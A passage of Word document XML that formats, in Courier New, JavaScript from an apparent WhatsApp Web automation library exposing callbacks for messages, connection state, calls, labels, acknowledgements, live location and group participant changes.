        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const cb = (msg) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                if (msg.id._serialized === newMessage.id._serialized &amp;&amp; msg.clientUrl) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    callback(WAPI.processMessageObj(msg, true, false));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    Store.Msg.off('change:isUnsentMedia', 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Store.Msg.on('change:isUnsentMedia', cb);</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let pm = window.WAPI.processMessageObj(newMessage, true, true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            let message = pm ? JSON.parse(JSON.stringify(pm)) : WAPI.quickClean(newMessage.attributes);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (message) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                callback(message)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a callback to be called when a the acknowledgement state of the phone connection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param callback - function - Callback function to be called when the device state changes. this returns 'CONNECTED' or 'TIMEOUT'</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window.WAPI.onStateChanged = function (callback) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    window.Store.State.default.on('change:state', ({ state }) =&gt; callback(state))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Returns the current state of the session. Possible state values:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "CONFLICT"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "CONNECTED"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "DEPRECATED_VERSION"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "OPENING"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "PAIRING"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "PROXYBLOCK"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "SMB_TOS_BLOCK"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "TIMEOUT"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "TOS_BLOCK"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "UNLAUNCHED"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "UNPAIRED"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * "UNPAIRED_IDLE"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window.WAPI.getState = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Store.State.default.state;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a callback to be called when your phone receives a new call request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param callback - function - Callback function to be called upon a new call. returns a call object.</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window.WAPI.onIncomingCall = function (callback) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    window.Store.Call.on('add', callback);</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@param label: either the id or the name of the label. id will be something simple like anhy nnumber from 1-10, name is the label of the label if that makes sense.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param objectId The Chat, message or contact id to which you want to add a label</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param type The type of the action. It can be either "add" or "remove"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns boolean true if it worked otherwise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window.WAPI.addOrRemoveLabels = async function (label, objectId, type) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var { id } = Store.Label.models.find(x =&gt; x.id == label || x.name == label)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var to = Store.Chat.get(objectId) || Store.Msg.get(objectId) || Store.Contact.get(objectId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!id || !to) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const { status } = await Store.Label.addOrRemoveLabels([{ id, type }], [to]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return status ===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a callback to be called when a the acknowledgement state of a message changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param callback - function - Callback function to be called when a message acknowledgement changes.</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window.WAPI.onAck = function (callback) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Store.Msg.on("change:ack", m =&gt; callback(WAPI.quickClean(m)));</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//returns an array of liveLocationChangeObjects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.forceUpdateLiveLocation = async function (chatId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!Store.LiveLocation.get(chatId)) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return WAPI.quickClean(await Store.LiveLocation.update(chatId)).participants.map(l =&gt;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...l,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            msgId: l.msg.id._serialized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window.WAPI.onLiveLocation = function (chatId, callback) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var lLChat = Store.LiveLocation.get(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (lLChat) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        var validLocs = lLChat.participants.validLocations();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        validLocs.map(x =&gt; x.on('change:lastUpdated', (x, y, z) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { id, lat, lng, accuracy, degrees, speed, lastUpdated } = x;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const l = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                id: id.toString(), lat, lng, accuracy, degrees, speed, lastUpdated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window.WAPI.onBattery = function (callback) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // window.Store.Conn.on('change:battery', ({battery}) =&gt;  callback(battery));</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window.WAPI.onPlugged = function (callback) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // window.Store.Conn.on('change:plugged', ({plugged}) =&gt;  callback(plugged));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new approach to listening to add and remove events from groups. This takes only a callback and is prevents memory leaks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WAPI.onGlobalParicipantsChanged = function (callback) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const events = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        'change:isAdmin',</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id = eventName.replace('group_participant_change','');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const chats = Store.GroupMetadata.models</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        //.filter(group=&gt;group.participants.models.find(participant=&gt;participant.id._serialized===id))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        .filter(x =&gt; x.id.server !== 'broadcast').map(group =&gt; window.Store.Chat.get(group.id._serialized));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const cb = (eventName, eventData, extra) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (events.includes(eventName)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            let action = eventName;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (eventName == 'change:isAdmin') {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                action = extra ? 'promote' : 'demote';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by: undefined,</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who: eventData.id._serialized,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                chat: extra.parent.id._serialized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chats.map(chat =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                chat.groupMetadata.participants.off('all', cb)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                chat.groupMetadata.participants.off(cb)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chats.map(chat =&gt; chat.groupMetadata.participants.on('all', cb));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Store.GroupMetadata.on('all', (eventName, groupId) =&gt; chats.map(chat =&gt; chat.groupMetadata.participants.on('all', cb)))</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a callback to participant changes on a certain, specific group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param groupId - string - The id of the group that you want to attach the callback to.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param callback - function - Callback function to be called when a message acknowledgement changes. The callback returns 3 variables</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window.WAPI.onParticipantsChanged = function (groupId, callback) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const subtypeEvents = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "invite",</w:t>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"leave",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "promote",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "demote"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events = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        'change:isAdmin',</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chat = window.Store.Chat.get(groupId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    chat.groupMetadata.participants.on('all', (eventName, eventData, extra) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (events.includes(eventName)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            let action = eventName;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (eventName == 'change:isAdmin') {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                action = extra ? 'promote' : 'demote';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by: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                action: action,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                who: eventData.id._serialized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a callback to participant changes on a certain, specific group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param groupId - string - The id of the group that you want to attach the callback to.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param callback - function - Callback function to be called when a message acknowledgement changes. The callback returns 3 variables</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window.groupParticpiantsEvents = {};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI._onParticipantsChanged = function (groupId, callback) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const subtypeEvents = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "invite",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "add",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
